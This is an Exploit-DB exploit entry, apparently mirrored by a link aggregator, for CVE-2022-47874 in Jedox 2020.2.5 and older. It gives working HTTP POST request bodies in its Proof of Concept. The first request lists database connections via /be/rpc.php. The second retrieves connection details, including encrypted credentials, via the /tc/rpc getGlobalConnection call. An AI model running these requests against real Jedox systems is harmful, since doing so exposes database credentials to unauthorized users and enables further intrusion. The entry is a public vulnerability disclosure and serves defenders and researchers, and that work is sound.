4
[webapps] Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Acces...
source link: https://www.exploit-db.com/exploits/51428
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls
# Exploit Title: Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2020.2 (20.2.5) and older
# CVE : CVE-2022-47874
Introduction
=================
Improper access controls in `/tc/rpc` allows remote authenticated users to view details of database connections via the class `com.jedox.etl.mngr.Connections` and the method `getGlobalConnection`. To exploit the vulnerability, the attacker must know the name of the database connection.
Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
Proof of Concept
=================
1) List all available database connections via `conn::ls` (see also: CVE-2022-47879):
PATH: /be/rpc.php
METHOD: POST
BODY:
[
[
"conn",
"ls",
[
null,
false,
true,
[
"type",
"active",
"description"
]
]
]
]
2) Retrieve details of a database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`:
PATH: /tc/rpc
METHOD: POST
BODY:
[
[
"com.jedox.etl.mngr.Connections",
"getGlobalConnection",
[
"<CONNECTION>"
]
]
]
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK